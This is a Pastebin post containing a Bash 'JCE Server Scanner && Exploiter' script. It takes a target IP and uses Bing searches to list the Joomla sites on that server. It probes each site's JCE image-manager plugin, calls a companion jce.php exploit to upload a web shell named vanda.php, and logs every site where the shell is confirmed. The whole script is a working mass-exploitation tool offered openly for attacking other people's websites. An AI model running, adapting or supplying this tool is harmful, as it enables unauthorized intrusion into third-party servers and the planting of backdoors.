Advertisement
Russian_Hackers

[RH] - Exploiter Scanner Shells.php

Mar 15th, 2015
397
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 6.21 KB | None | 0 0
  1. #!/bin/bash
  2. # Jce Server Scanner && Exploiter
  3. # Coded By : Red V!per  
  4. # http://redhat-viper.blogspot.com
  5. # Report Bugs : RedH4t.Viper@yahoo.com
  6. # D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
  7. # Gr33tz   : All Turkish && Persian Hacker
  8. #--------------------------------------------------------------------------------------------------------------------
  9. #
  10. # Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com
  11. # devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
  12. #
  13.  
  14.  
  15. #-------------------- Red V!per Banner ----------------------------------------------------------------------------
  16. Banner()
  17. {
  18. clear
  19. echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
  20. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
  21. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
  22. echo -e '\E[34m'" ||                                                      || "; tput sgr0
  23. echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0
  24. echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0
  25. echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0
  26. echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0
  27. echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0
  28. echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0
  29. echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0
  30. echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0
  31. echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0    
  32. echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0  
  33. echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0
  34. echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0
  35. echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0
  36. echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0
  37. echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0
  38. echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0
  39. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
  40. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
  41. echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
  42. sleep 3
  43. echo
  44. echo -e "$B /\ (^_^) /\ [public] \n"
  45. echo -e " -===============================================-\n"
  46. echo -e "   Server Jce Scanner && Exploiter"
  47. echo  
  48. echo -e "   BY : Red V!per\n"
  49. echo -e " -===============================================-"
  50. echo
  51. echo
  52. echo -e " -========== [         INFO         ] ===========-"
  53. echo
  54. read -p "[*] Target Ip : " IP
  55. echo -e "$N"
  56. }
  57.  
  58. #-------------------- Variables ----------------------------------------------------------------------------
  59.  
  60. B="\033[1m"
  61. N="\033[0m"
  62. L="\033[5m"
  63. C="\033[m"
  64.  
  65. #-------------------- Scanning Jce Targets on Server  -------------------------------------------------------
  66.  
  67. scan_jce_on_victim()
  68. {
  69. page=0  
  70. how_many=1  
  71. single_page=  
  72. last_page_check=
  73. image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
  74.  
  75.  while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do  
  76.  
  77. url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"  
  78.  
  79.  wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"  
  80.  
  81.  last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`  
  82.    
  83.  how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`  
  84.  
  85.  single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `  
  86.  
  87.  
  88.   cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt  
  89.   rm -f domain_bing.php  
  90.   let page=$page+1  
  91.   done  
  92.  
  93. cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
  94.  
  95. for domain in `cat domains.txt`  
  96.    do  
  97.      GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
  98.       if [ $check -eq 0 ]
  99.          then
  100.            echo "www.$domain" > site.lst
  101.            php jce.php site.lst shells.lst
  102.         GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
  103.         if [ $check2 -eq 0 ]
  104.         then
  105.         echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
  106.         echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
  107.         echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
  108.         else
  109.         echo "[-] www.$domain/ [No] "
  110.         fi    
  111.        else
  112.          echo "[-] www.$domain/ [No] "
  113.       fi    
  114.    done  
  115. rm -rf alldomain_bing.txt
  116. rm -rf domains.txt
  117. rm -rf site.lst
  118. rm -rf shells.lst
  119. }
  120.  
  121. #-------------------- Remove  ------------------------------------------------------------------------
  122. all_remove()
  123. {
  124.  rm -rf alldomain_bing*
  125.  rm -rf domains_f*
  126.  rm -rf domains_f*
  127.  rm -rf domain_bing*  
  128.  rm -rf alldomain_bing*
  129.  rm -rf domains*
  130.  rm -rf jce_server*
  131.  rm -rf site*
  132. }
  133.  
  134. #-------------------- Main Brain :D  ------------------------------------------------------------------------
  135. main()
  136. {
  137. chmod +x jce.php
  138.  
  139. if [ ! -f shells.lst ]; then
  140.     touch shells.lst ;
  141. fi
  142.  
  143. Banner;
  144. all_remove;
  145. scan_jce_on_victim;
  146. }
  147.  
  148. main;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement